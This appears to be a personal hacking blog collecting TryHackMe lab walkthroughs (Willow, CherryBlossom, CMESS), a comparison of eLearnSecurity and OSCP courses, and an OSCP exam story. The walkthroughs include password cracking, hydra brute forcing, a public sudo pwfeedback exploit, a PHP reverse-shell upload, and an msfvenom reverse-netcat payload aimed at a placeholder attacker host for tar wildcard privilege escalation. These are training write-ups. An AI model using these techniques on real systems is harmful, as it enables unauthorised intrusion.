Here we’re going to go through another box called Willow created by the amazing MuirlandOracle. Knowing this is one of his creations and having done his boxes in the past we can expect some encryption challenges and constant bumps in the road haha lets get in to it.
L3ts G3t $h3ll
Initial nmap scans shows the following ports open.
22 for SSH 80 for HTTP 111 for RPC bind 2049 for network file share
So let take a look at HTTP and see whats going on there.
Seems to be for now a huge string of random numbers, lets dig a little further in the other ports and see if we can find something that might give us a clue to what this is. Lets take a look at the NFS (Network File Share).
showmount -e <ipaddress>
Looking at the network file share it seems someone is sharing their /var/failsafe * folder. So lets mount this and take a look.
Looks to be the something to do with RSA key pairs so maybe that gives us a clue to whats on the web page.
Also note “Recovery Page” in title here
Lets see if we can work out what this is and decrypt it.
Putting this through CyberChef and using the SSH parser module we manage to decrypt this message and see a note about it being a SSH private key.
"Key type: Willow, here's your SSH Private key -- you know where the decryption key is!"
So I imagine where they’re saying “you know where the decryption” key is, it will be the things we found on the NFS to help us. Lets now use a RSA Calculator to work out and decrypt the encrypted message.
It should also be noted that MuirlandOracle has given his great explanation on RSA key generation and down at the bottom in the example scripts we can see that the E, N and D values are spat out. We have these values from the NFS.
Retrieved Private SSH Key
Great lets see if can save this and use it now!
Of course its never that fucking easy! however we can use our good old friend JohnTheRipper to convert this key in to a hash value and see if we can crack it!
Cracking time, again with john and using the rockyou wordlist.
Great we have the password so now lets try to SSH to the box again and see if we get in!
WERE IN!
Lets grab that user flag now we have our SSH shell on the box with Willow user.
RIGHT! of course theres always that extra step, right lets base64 this picture and transfer output to my box and decode it.
cat user.jpg | base64
Now take all that output from the above command and put it inside a file, I put it inside one I created called “user.b64” then cat’d and decoded that file and outputted it in to user.jpg.
cat user.b64 | base64 -d > user.jpg
We got user flag
Awesome we have our user flag!
L3t5 G3t r00t
Okay lets take a look around and see what we got to work with to get root.
Above we did the same procedure, but this time for getting the LinEnum script over to the box. Lets run LinEnum script now and sieve through the results.
Hmm okay lets make note that we can run /bin/mount command as root with no password, this might give us a hint to where we need to look.
If we look in the /dev file this is normally where devices or filesystems show up and then we would need to mount it to our directory tree somewhere.
a secret path
So with that and knowing we can run mount command as sudo lets try and mount this partition on to /mnt/creds.
Now lets take a look inside the partion and see if we find anything useful
OH YEAH CREDS!!!!
Amazing we have the root and Willow users passwords. lets switch users to the root and get that root flag.
Again another roadblock! well lets now try and work this out. We have the root password and the willow password but what does “I gave you the root flag some time ago” mean? hmmm…
OF COURSE!!!!
That little sneaky bastard I bet has hid something in the user.jpg! okay lets see if we can extract it using steghide.
sneaky sneaky sneaky!root flag!
ROOOOOOOOT!!
Thanks again MuirlandOracle for another interesting, and infuriating box haha hope you all learnt something from this box ๐
This is my walkthrough on how I did the CherryBlossom box on tryhackme.com. It was an amazing box and fair play to the creator for this one, a very smart guy known only as MuirlandOracle.
This box consists of multiple layers of stegonography which eventually leads you to a journal/diary from which you find information that leads you to a shell on the box, then lateral movement to another user and finally rooting the box. It was painstaking work and not for the fainthearted ๐ enjoy the read.
Warning: most filenames have been either changed in the screenshots or blurred to encourage you to go find these things yourself ๐
L3t’s G3t A $h3ll
First things first we need to do nmap scan of the box.
Nmap shows us that we have ports 22 SSH, 139 and 445 for Samba open, lets start enumerating the samba services using enum4linux.
enum4linux -a <ipaddress>
Cool we found an open share, now lets flick over to another tool for further enumeration on smb called smbmap, this will try to list shares and its contents if reable.
smbmap -H <ipaddress>
Great, we found within that share a .txt file so lets use smbmap to download it.
Okay so lets take a look in to this file and see what it is and see if we have anything juicy within.
By the looks of it, it just seems to be base64 so lets decode it and see what we get from it.
cat <file> | base64 -d > decoded.b64
Now we have something that looks like a PNG file so lets take a look.
hmmm just a picture of cherry blossom so lets do a little more digging in to the picture and see whats going on, for this im going to start using a toolkit called stego-toolkit and it can be found here.
Not going to give a full walkthrough on how this tool works as there is quite a few online but you can run either check_png.sh <filename> or check_jpg.sh <filename> and it will run a series of checks against your file. Here I used check_png.sh decoded.b64.
The thing that raised my suspicions about this picture having something to hide was the file was 2.5MB large and another tool called zsteg kept finding “Secret” stuff within. Dont believe everything you see from one tool make sure to use 2 or 3 different ones.
zsteg output
Lets try and use another tool within this toolkit to extract anything from the picture, here we use stegpy <filename>.
Great, so we have extracted a zip file so lets take a look at this now (name of file was changed)
Hmm thats odd this zip is telling us its another picture. lets try and unzip it.
This time we get an error about the files header signature, so lets take a closer look at the hex and see whats going on, for this I used an awesome online tool called HexEd.it – Great little tool.
Okay we have a .ctz (cherrytree filename) within a zip file that is using JPEG magic byte numbers, this sounds confusing and it is, but basically magic byte numbers OR file signatures, are a unique set of numbers that identifies what type of file something is. For a list of singature numbers go here – File Signatures.
JPEG’s signature is “FF D8 FF D8”
lets change these JPEG signatures to be that of a ZIP file, ill let you hunt out the signatures for that ๐ .
Should look like a ZIP now.
Now lets export this and try and unzip it again and see if it works.
Okay great, we get asked for a password to extract this new mystery .ctz file.
Lets use another tool in stego-toolkit called fcrackzip that is a password attacker for ZIP files and lets see if we can get a password for our zipped file.
Amazing we have a password so now lets unzip this password protected file, and see what comes out.
Great we have ourselves a .ctz file which is a CherryTree file that has been zipped and password protected (I renamed the file to diary.ctz).
So with it being a 7-zip file we can use JTR (JohnTheRipper) to convert this for us in to a hash for a bit of a hash cracking session ๐ like we havent done enough at this stage!
Thats a little small to see but I’m running 7z2john against our diary.ctz and its throwing us an error and saying we’re missing a module, lets see if we can find this module and install it. *Skipping 15 mins of searching here for module*.
Okay great so running that again with our new module installed, we get a great big dirty SHA256 hash that we will store in a file called “hash” original I know. Time to crack the hash, we are going to use john for this and the rockyou.txt wordlist.
Password retrieved lets see if we can now open this password protected cherrytree file using CherryTree.
Cool so we have a diary with a few entries, I wont spoil anything here for anyone, but I’ll let you read through it. In one of the entries we find the journal flag.
FIRST FLAG!
The important part here is that we get a few potential usernames including person’s girlfriend. He later talks in his diary about how his got a list of unique passwords he created and how he has chosen one and his girlfriend has chosen one so that’s 2 passwords from the list that is now used. Password lists were in the diary as well as an attached file. I wont tell you which one I used.
With that information lets see if we can hydra our way in to his girlfriends account as we see her username and we dont know the other persons name yet as they refer to themselves with their intial. We see this by looking at the diary entries.
Hydra is a great tool for bruteforcing a range of logins and more! Here we are using it with the girlfriend as the username, a password list, -V for verbosity and see every login attempt, -f to stop the attack upon first successful login, -e ns to try the username and blank password as a password.
SUCCESS!!!
Lets try and SSH in and see what we get.
Great we have our intial shell on the target machine ๐ BUT not user as no user flag yet ๐ฆ more digging…
L4ter4l M0v3MenT
Now our next step is going to be a lateral move across to the boyfriend who is the owner of the diary and a user on the box.
Lets upload our favourite tool Linpeas using a another tool I have grown to love and has replaced the good old “python SimpleHTTPServer” module called updog. Kick that off and see what we find. updog is amazing! I highly suggest go checking it out!
With that running we can now do a wget of our linpeas script on the ssh shell we have.
getting linpeas, easy as that.
After some very deep looking we find an interesting file in our linpeas results.
Lets go take a look at that and see what we find.
Great we found some hashes including the boyfriends hash, lets see if we can crack one of them as we already have the password to the other girlfriends account.
Using hashcat we can start cracking our hash using the following:
-m specifies the hash type we are cracking -o is the outfile name to put a password if cracked -O is to optimize the cracking
If you find it taking a while to crack try to remember something from the diary.
Eventually, password cracks and now we can try loggin in via SSH to this user.
That failed, maybe its because SSH login is not permitted for this user so lets go back to the girlfriends shell and try switching user.
su <username>
simple “su <username” seemed to work just fine, and we get user flag.
L3t’s G3t R00t
Okay now lets copy the Linpeas script over to this user and run it as him and see if he has anything cool to find.
After some more digging we find we should try “sudo -l” and see what we can run as root user. This is one of the first things you should try when you get access, its always nice to find easy wins.
Thats strange, we should’nt be getting the password echo’ed back to us this is a function called pwfeedback thats enabled in the /etc/sudoers config, more about it her CVE-2019-18634. Basically a stack buffer overflow in this version.
Git clone the file down, and then compile the code with gcc by running the following
gcc exploit.c -o exploit
Updog this exploit now to the box and run it.
!!!ROOT!!!
Hope you enjoyed it as much as I did, very frustrating but fun and rewarding and learnt loads! thanks again MuirlandOracle for the box it was truly a great experience!
This is going to be a simple walkthrough on how I did CMESS box on TryHackMe.com. The privilege escalation demonstartes a really good use of wildcard exploitation. The creator of the box is Optional and thank you to him for creating an awesome fun box.
Let’s g3t 4 Sh3ll
First things first we’re told to add the hostname to our /etc/hosts file.
So kicking off the box with an nmap scan we see only ports 80 and 22 open.
Heading over to port 80 we see a simple and pretty empty home page.
Running gobuster on the site gives us quite a few entries back.
As well as directories we should always enumerate for any subdomains, for that i used a tool called wfuzz.
Here we see that we got a subdomain back, so add this entry in to the hosts file also, so we can browse to it.
Upon going to our new found subdomain we see a conversation between the user, andre and support. These are both email address or possible usernames we could use in the future so make note of these.
We also see that support user has reset andre’s password so lets take that and see if we can use it anywhere. looking back at our gobuster output we can see we have a /admin directory. Lets take a look.
We find a login page that takes an email and a password, these we have so lets try it.
And we get logged in. Straight away we see a “Gila CMS version” so lets take a look if there’s any exploits for it.
Searchsploit shows that there is a LFI or Local File Inclusion for this version so lets take a look using
searchsploit -x <exploit-path>
Lets see if we can use the last bit of this url in the CMS we have access to and see if it returns anything.
Append this to the end of our URL.
Okay great! we see we have some type of directory listing now with some upload functionaly so lets see if we can upload a shell.
We manage to upload a payload which goes in to the “assets” directory. Lets start listener and then browse to http://cmess.thm/assets/php-reverse-shell.phpto get the server to process the payload.
Awesome we have a shell as www-data. Looking around we see we cant get in to the andre directory, so our next step is lateral movement to andre.
Lat3ral m0ve to Andre u5er…
Lets head over to the /tmp directory and grab linenum.sh and see what we can do as www-data user and maybe see if we can find anything interesting.
Grab the linenum.sh file“python3 -m http.server” to serve the request for “le.sh” (linenum.sh)
Kicking this off with “./le.sh -t”. The “-t” is for thorough testing, we then see in the results some interesting files lurking about.
This looks interesting so lets take a look.
Awesome we found a password!! lets see if we can now SSH to the box as andre ๐
Awesome lets grab user.txt while we’re here ๐
L3ts g3t R00T!
Nice we got user!! lets repeat the linenum process and see if we can do anything else new. However this time im going to use an “upgraded” version of LinEnum called LinPeas. This does the same thing as linenum and some more…
Linpeas has a wicked awesome colour scheme for quickly hunting out privelege escalation points! so lets begin the hunt.
Looking in to our results from linpeas we see that its flagged a cronjob that runs as root every 2 mins.
This job is running a tar command to backup the andre users “backup” directory and everything in it.
we need to create 2 directories and a shell.sh file inside /home/andre/backup directory that tar will see and interpret it as commands and execute. SUCKAA!
msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Msfvenom to create a payload
Start our listener for this payload
Head over to the directory thats going to be backed up by tar, we see a little note.
lets now echo our payload in to “shell.sh” and create the 2 directories needed for this exploit.
Now we wait for the cron job to run and we should get tar interpret them commands and execute our shell.sh file.
run “date” to see the systems time
Woop Woop we got our shell back from the box!
This was a great box and really demonstrated the issues behind using wildcard’s in automated jobs or scripts, and how a hacker can leverage these vulnerabilies to gain higher privileges.
I have seen a lot of conversation about the difference in both these providers of penetration testing courses or hacking courses. So below I’m going to give you my run down of the 2. Also I’m stating now that I aint the best at spelling and grammar so dont be a fuck-tard and start correcting my shit, just read and get on with it!
Now I just want to let you know I have my OSCP Certificate and my eJPT (Junior Penetration Tester) certificate and have bought but not completed the ELearnSecurity PTP cource. So from here on I speak about my opinions, of which are my own, and my experience with both of these.
So if you’re new to the Cyber Security world and you wanna become a fu*king hacker baby! then you would’ve definitely have googled “how to become a hacker”, “how do I start in penetration testing” or “does my cat secretly watch me while I sleep”. Okay maybe not that last one, but yeah the other two. I know I did when I first started, and right now you’ll get lots of different results and thats how you might of even ended up here. Eventually you’ll work out that you need to get OSCP and maybe some other certificates or qualifications but you tend to always read “OSCP is a must, to get a job in Cyber security”. Then you realize that OSCP is a bit f*cking mental and probably for the 1337 wannabe hackers, so you start looking around for courses in penetration testing and hacking and you’ll find this company called ELearnSecurity, which deliver complete beginner courses in penetration testing. So lets go in to that and talk differences about ELearnSecurity’s PTS (Penetration Testing Student) source and OSCP.
ELearnSecurity
So ELearnSecurity is first of all amazing, it really is. Head over to their website and check out the courses they provide. When I did this exactly 2 years ago today I found myself really interested in the PTS course (Penetration Testing Student) which was their course for people with NO EXPERIENCE AT ALL!!! So I bought it, and got started!
Looking at the syllabus I felt pretty confident I could jump in to this and invest a few hours a day learning their powerpoint style material and the videos at the end of each section drilling in everything you learnt in utter detail!
PTS Syllabus
The course takes you through a very structured way of learning, it teaches you all the basics you need to know like NMAP scans and different flags to use, what and how XSS scripts and SQL Injections work, how to exploit SMB attacks and many more. Each section generally teaches you a subject and then finishes it with a video or 2 about it, where the instructor shows you step by step what you just learned in the slides, this method of teaching is really good and really drove home certain points you need to remember. Then once you have learnt that section, lets say on NMAP it then gets you to start the “NMAP Lab” where you will then open the challenges for that lab and it will ask you something like “What ports are open on the 3 computers in the network” and then you put to test everything you learned from that NMAP section. Below is a list of labs from PTSv3! I think they’re on V5 now but as far as im aware not to much has changed just some more stuff added, when you buy the course you will get the latest and greatest version.
PTSv3 Labs
There sh*t is structured, nice and just damn right sexy. It will take you from an absolute n00bian and give you those foundations you will need to start enumerating shit and hacking things. It gives you enough experience that once completed you can start jumping on the active boxes in HTB or smash your way through the labs/VM’s in Vulnhub.
EXAM TIME. Once you have finished all the course material, the videos, and then completed all the labs (do them twice over). You will have to do your exam the eJPT exam, to test your new powers! Now the exam is good fun, here you will be presented with a domain network style pentest and have to hack your way through like 10 computers and 3 servers to answer questions that get given to you at the beginning. If I remember rightly there are about 20 questions ranging from things you will find in this domain network testy environment exam thingy and you have 3 days to complete this exam! Now honestly it took me around 8 hours to do the whole thing, and I was a NOOB! thats not to say its easy though!…
Once completed, and you submit your answers and you feel you have done and got everything you need you will hit that big fuc*ing submit button and wait, after a while the page will load up and it will tell you if you have passed or failed. Honestly its a beginner course and it will deffo teach you everything you need to know in order to pass and get your feet wet in the real world!
ELearnSecurity Recap:
Online course available 24/7.
Powerpoint type presentations.
Multiple Videos for each sections.
Individual labs for end of every section.
3 Day Question based exam on domain network (more than enough time).
OSCP
Right where do I start with OSCP, there are a lot of reviews and blogs out there for this one so I will go over my findings of the course. OSCP is Offensive Security Certified Professional its considered the 31337 course and exam to prove to oneself that you’re a hacker/penetration tester. In order to become OSCP certified you will need to do their PWK course and pass the exam, details on that are here.
So I started my OSCP journey back in august 2018 and passed in February 2019, I’m not going to bore you with the details as the actual journey and write up can be found here. I will however tell you how its structured!
When you buy OSCP you will start it on the 2nd Sunday from the day you bought the course, I’m sure thats how it works. On day one you will get an email with all the course material and connection packages (VPN files) to get started.
Now when you have download all this you will have a folder called “oscp-pwk” or something along those lines and inside there are your ~350 page PDF manual and all the training videos. You open up the video training and it will look like the below.
OSCP Videos
You will be shown everything from netcat listeners to reverse shells, from exploiting SQL injections to privilege escalation and gaining root. Once you’ve gone through all the PDF and videos that they provide, which took me about a week, you will then VPN to the labs. once in you’re faced with a big domain network and left to do what you want, you’re free to go explore and hack your way through their network as long as you follow a couple rules and respect others that might be using or have used a box. I advise giving a box a reset before you jump on it! Below is a map of their network, you will start in the “Student Labs, Public Network” and hack your way through and pivot your way to other networks with the goal being admin department!
Now Offensive Security throughout their training will give you JUST enough information to get you started on boxes and then leave you to find the answers for yourself! For example they will show you what things to look for when hacking a web app on a server, but it will be up to you to find out how to hack the stuff on the website like the E-commerce shop on there or how to hack the actual web server the web app sits on.
With OSCP you will find yourselves in Google a lot searching up exploits for certain versions of things or finding out how to privilege escalate a Windows/Linux computer. You will also find yourself in Exploit-DB a lot which is basically, in short, a library of exploits for all sorts of things! and sometimes you will have to make changes to them exploits!
The Exam is basically 5 computers separate from each other, and all have their own unique ways of being pwned, you have to pwn it and get a shell and then root/admin it to get full points for it. Each of the 5 boxes are point based and you have to get 70 POINTS OUT OF 100 WITHIN 24 HOURS TO WIN! Below is a quick look at what boxes are worth, points wise.
25 point box ( Buffer Over Flow )
25 point box
20 point box
20 point box
10 point box
Therefore its up to you how you tackle this and get your points! BUT thats not the end! once you’ve got all your points you will then need to WRITE A REPORT WITHIN 24HRS! and this is all back to back so from the moment you start your exam you have basically 48 hours to hack sh*t up and get a report back to Offensive Security, then takes a couple days to get your results! You best make sure you report is shit hot cause they can and will fail you for spelling or grammar mistakes!!! Sh*t they will fail you for sending them the report unencrypted, but dont worry you will be told how to do this when the time comes!
OSCP Recap:
~350 page PDF Manual.
Offline Video led training.
24/7 access to domain network lab.
Offensive Security show only enough to get you started.
A lot you learn as you go through labs and research.
24hr Practical Exam.
24hr Report Writing.
Conclusion
If your starting your journey in to Cyber Security and you wanna become a f*cking awesome hacker and you dont know where to start then head over to ELearnSecurity and do their PTS (Penetration Testing Student) course, then once completed jump on OSCP, skip their PTP (Penetration Testing Professional) course as you wont need it to pass OSCP! OSCP will teach you enough to pass their exam if you go in to it knowing the foundations of hacking.
If your already hacking things and know your way around enumeration a bit and can comfortably exploit things and get shellz then skip ELearn’s PTS and jump straight on to OSCP and start bashing away at that. OSCP will take you from foundation knowledge to advanced and get you hacking away even better than you was.
Remember that OSCP is also a beginner course, this is something a lot of people forget and they do provide some mega good training, but after that your left to do your own research and exploitation.
Any questions let me know… Hope you enjoyed!
and for those out there now doing your OSCP or eJPT exam then I say this to you!
A write up on the path I took to gain my OSCP Certificate. With a few tips that i hope will help you!
I also wanna quickly say a massive thanks to my partner and our kid who have put up with me being in my office, sat at my computer, smashing OSCP for to long! Thanks for putting up with all my shit since day 1 ๐
Before I get started I just wanted to say my writing skills can be god awful and it will probably contain spelling & grammar mistakes left, right and center, so either tell me or move on! I’m Also from the UK so for my Yankee friends out there we do spell things a little different ๐
***Warning: A lot of swearing and gif’s below***
The History
So looking back now since I can remember I have always thought it would be so cool to be a “hacker” you see it in movies the people smashing away at the keyboard, sweat down their face and then with a big finisher, BAM! there in! I wanted to be those people, and for those of you who think its still like that, it really isn’t lol.
Right, little history on me as people always ask, and if your not interested scroll through. I’m currently in my mid 20’s I have always loved technology and shit, never knew I would end up working in IT or Cyber Sec. I was a little shit at school and came out with a C in math and a C in IT and that’s it! i didn’t go to 6th Form, College or University i always thought as a kid them places were for posh twats (your not posh twats, just educated ones) haha.
Where it began
So, one day back in mid 2015 I get a call from this fucking sales guy, his telling me I can become this 3L337 H4X0R (Elite Hacker) by taking one of their courses where you study from home and all this waffle right, he was calling it “Certified Ethical Hacker”. He went on for a good 20 minutes telling me how I can do this course and come out ready to jump in to hacking and earn big money. First time I told him i wasn’t interested and maybe call me back when I had a job and could afford it. He calls me back a month later and I thought you know what i’ll give it a go! after all I always wanted to be a sweaty keyboard smashing hacker haha.
So, now im enrolled and the learning packages come in, there are different modules I had to study and then exams to take at the end when I felt ready, they also included all these labs with it. courses that were included:
CompTIA A+
CompTIA Network+
CompTIA Security+
CEH
Me being jobless I thought right lets crack in to this and started on them in the order above, I instantly fell in love even more with computers when I started this course.
Now, months go by and the only certificate I ever achieved was the CompTIA A+, which was enough for me to land my first job, the course ended up getting ignored, but I didn’t care I now had my first job as an IT Technical Support and thought id learn loads now from this with the end goal to become a PENETRATION TESTER. spent a few months there before I left because management was a bunch of stuck up twats. Then spent a few months bouncing around from job to job doing IT Support etc.
Now, its 2017 and i end up moving to the middle of the UK near Sheffield, and start this new job which I was with for a whole year. While there I gained my CompTIA Network+. So now I been doing random IT jobs for the last 2 years and have gained my CompTIA A+ and my CompTIA Network+ sweet lets start looking at IT security now!
Lets start moving to Cyber Security
After so much hunting around I wanted to know how to start becoming a pen tester and with that you start googling what the best course is to take. I found loads, and in the end I found ELearnSecurity, they teach people with no hacking skills the foundations and get them started in to pentesting and taking on the world haha. So, In January 2018 I started the “full” edition of ELearnSecurity Pentesting student v3 (PTSv3 I think the latest now is v5). I studied hard and smashed the labs hard and learnt SOOOOOO MUCH!! I highly recommend this to anyone wanting to start pen testing and not sure where to begin!. did this for a couple months completed the course, took the exam in March 2018 which consisted of a 3 day practical exam where you hack your way through this environment which was a series of computers and servers and had to answer questions about things you obtained or found on the machines, very challenging! I got 92.5% pass so I challenge you reading this to try beat me! ๐
With the ELearnSecurity Junior Penetration Tester (eJPT) certificate under my belt I thought lets start applying for junior pen test jobs and eventually landed one near me, the interview went really well, I spoke a lot about tools and skills I learned from ELearnSec and they believed the could mould me in to a fine tester. They took me on! having been with these guys a while it was time to start OSCP!!!
OSCP Time!
OSCP time baby!!! I wanted to do OSCP so much now I was always involved with some type of Cyber Security with these guys and everyone there knew I wanted to be an 3L337 H4X0R. So I started OSCP after one of my colleagues who already owns OSCP was always saying “Just fucking do it! fuck it! youll love it!” haha so I did.
In the beginning of August 2018 i registered for OSCP with 60 days of labs, email comes through asking about current skills levels and knowledge, I answer truthfully and they say something along the lines of “Based on your current level we suggest you learn a bit more”, I said “fuck that just sign me up!”.
I get my email confirmation after I paid and it stated that my course will begin the following Sunday. So now I began waiting and waiting and waiting….
Sunday comes along and on the dot the email comes in!!!
I download the Kali VM, Connection pack and all the learning material. I had booked a weeks holiday in prep for this as well so I was ready to start the learning and the pain to follow haha. I kissed my partner good bye as she knew I will spend endless nights from now on in my office working hard.
I logged in and started ploughing through the material. I was learning how to start all these bind connections and reverse shell connections from server to computer and vice versa, learning bash scripting and creating shit with that, banner grabbing, BOF, enumeration skills and exploitation skills. This course is great! you learn so much in the beginning but Offensive Security have a clever way to only teach you enough about something that once you started using it in the labs you have to start your own research and googling around, you spend a lot of time googling for things as they only teach you the fundementals.
The Labs
I finished the material in a week! and made start on the labs, it was a grind!!! some boxes are simple some are just fucking insane and frustrating! Some you just spend hours on and slap yourself once you got it and think “how the fuck did I not see that?!”.
Prepare for hours and hours and hours of work, I remember one box took me around 3 weeks on and off till I eventually got it! and it was worth it! the best advice I can give is don’t give up and as always TryHarder. fucking “try harder” them 2 words were the most demoralizing words you hear in your head when your stuck, if you ask someone for help and your stuck at a point that’s so fucking simple and you haven’t worked it out yet you’ll hear “Try Harder!” haha. fuck you Try Harder! lol
The labs are so much fun there are also different networks that you have to try and get in to, but I wont tell you about them you’ll have to find your way to them yourself! I did get in to one of them though ๐
I ended up at the end of the 60 days with under 20 boxes rooted, which compared to others was shit! however I did spend a lot of time on some boxes more than others, which is all worth it in the end! I had also rooted 2 out of the 4 infamous boxes, Gh0st and Pain! there was so much time spent on them two and trust me if your going to take them on they are extremely hard and you will learn a lot from them! I cant express how much of a pain in the arse they are to complete. There was times I was just like fuck you and this shit course!!!!
But I carried on and worked hard and learnt from my mistakes which is something you will do a lot of when you do the course and embark on this journey to become OSCP Certified.
Exam Attempt #1 (FAIL)
So its the 14th of October and it was time to get in to the exam. Email comes in exactly on the dot!!! im so impressed with the timings that Offensive Security get these emails in their students inbox.
Now ill be honest the best advice that was given for the exam was to expect to fail the first one! The exams test every single aspect of what you have learnt in the course. I went in to this first exam expecting to fail but would still give it my everything!!
I connect in and start enumerating I see a few boxes with a shit load of ports open on them all. I spent only an hour before I got my first low privilege shell, and then 2 hours later I got my second privilege shell, I thought “oh shit yeah im fucking winning!”, I honestly thought I had it in the bag! I then spent the remaining 20 hours with 2 low privilege shells and not a single root!!! NOT 1 ROOT!!!! I was proper pissed off, I expected to fail but not that fucking hard!!! I thought I worked so hard to have a good chance in the first exam but, nope!
I was pissed but oh well! I did get one thing out of it, and i learnt all my weak areas!
I bought another 30 days lab extension, booked my exam for a couple months from now and got my head in the game. I rooted more boxes and now was around 25 boxes rooted in the labs, learning something new from every new root. After my 30 days was up I spent some time in hackthebox.eu and VulnHub, I practiced, practiced and practiced some more, I worked harder then ever before! I……was…..determined!
Exam Attempt #2 (PASS)
Its the 3rd of February im sat down at 11:00am and PC is powered on, VM is up and running and warmed up. im sitting staring at the inbox.
DING!! the email comes in at 11:45am and I open it up and start downloading the connection pack. I connect to the VPN and run the script that the proctored guys want you to run to test everything is connected properly and all was good. Now I’ll be honest I wasn’t worried about the exam being proctored, the guys that do it are super cool and a good laugh, while I was waiting for their script to run (1 minute or so) one of them told me a joke which was quite funny, if your reading this now thanks it made me laugh. So, with the exam proctoring stuff connected and working, which also didn’t really affect my CPU or RAM at all! I was ready. So, now they can see me on the webcam and see my screens there happy, we waited a few minutes and then the clock struck 12pm I got the green light from them to start the exam!
Scans away! I set off some big fucking nmap scans that I knew would take a while but present me with some good information. while they was scanning I sat deep in my chair and staring at my screen through squinted eyes developing the buffer overflow exploit. within about an hour I had a working BOF exploit for the BOF box! I ran it and instantly got a reverse shell!
FUCK YEAH!!!
I documented everything, nmap scans finished and I start looking through the results and then start making a move on to the next box, I went for the next highest point box and after an hour got a reverse shell, another 6 hours passed and I rooted that box, that’s now 2 roots on both the highest boxes in around 8 hours! Winning!
I carried on working on the remaining 3 boxes, after 2 hours I got a reverse shell on one box and the after a couple more hours I got a reverse shell on another box, both shells were Low Privilege shells! In 12 hours I had gained 2 roots on the 25 point boxes and 2 low priv shells on both 20 point boxes. I tried for hours to privilege escalate these windows boxes and got no where, and the 10 point one was so annoying and confusing I just told it to do one and gave up on it lol I thought it would be more beneficial to put whatever time I had left in to the 2 20’s and try get some where.
Time went by so fast!! I went to bed at 4:30am and was up again at 8:00am trying to escalate these windows machines and to be honest I now know looking back I was trying wayyyyyy to hard and the most random shit that got me no where lol oh well. I made sure that the boxes I did get, that I had enough documentation for the report for them.
Before I knew it the time was 11:45 and the proctor person messaged me to say that the exam was over and to close all proctoring sessions down. So I closed everything down and saved my notes.
I cant explain how I felt after all that was done, I collapsed in my chair and just exhaled so hard, I really felt like a gave it my all and hope that I had scraped enough point to pass. I was so tired!
Reporting
Reporting is reporting, im not sure what you guys want to know. but ill tell you what most people ask or what I have seen been asked about reporting. I used Microsoft Word on my windows machine to write the report. I followed the example report Offensive Security provide you with. I added loads of screenshots for each box, but not to many be sure to read the guides on reporting they send you.
I would say it was around 7 hours later before I proof read it around 6 times, then referencing the guide on how to ship Offensive Security the report it was off! Now the wait began. I sent my report at around 7pm that night and at around 10pm I received an email saying they had successfully received my exam report.
The next few days panned out like this….
Day 1 (Tuesday)
Day 2 (Wednesday)
Day 3 (Thursday)
Day 4 (Friday) came round and I woke up and got out of bed, every day so far I have checked my notifications on my phone but nothing.
So its 6am and I start getting read for work thinking “Today is the day!”.
I have breakfast, cuppa tea, go jump in the shower and while im getting dressed it happens!!!!
***EMAIL NOTIFICATION!**
I unlock my phone, click on my email app and see this.
I instantly shit myself! I don’t know how well I did after all I rooted both 25 point boxes and got low priv shell on the other 2 20 point boxes. But hey lets find out….
I clicked the email, it started loading!
Loaded!
OMG!
I finally did it! after so much hard work I finally passed the exam!
Below im going to leave some good links and things that i think anyone either wanting to start OSCP or start getting in to Pentesting can benefit from.
Advice I would give my younger self:
Practice makes perfect and always be trying to learn something new.
Learn Python and Bash scripting languages.
Save your OSCP notes in 3 different place, for me it was one on the VM one on my windows box and one in my Google drive.
Learn your BASICS in everything, computers, networking, scripting language, programming language.
Most of all have FUN and TryHarder, if it was easy everyone would be doing it!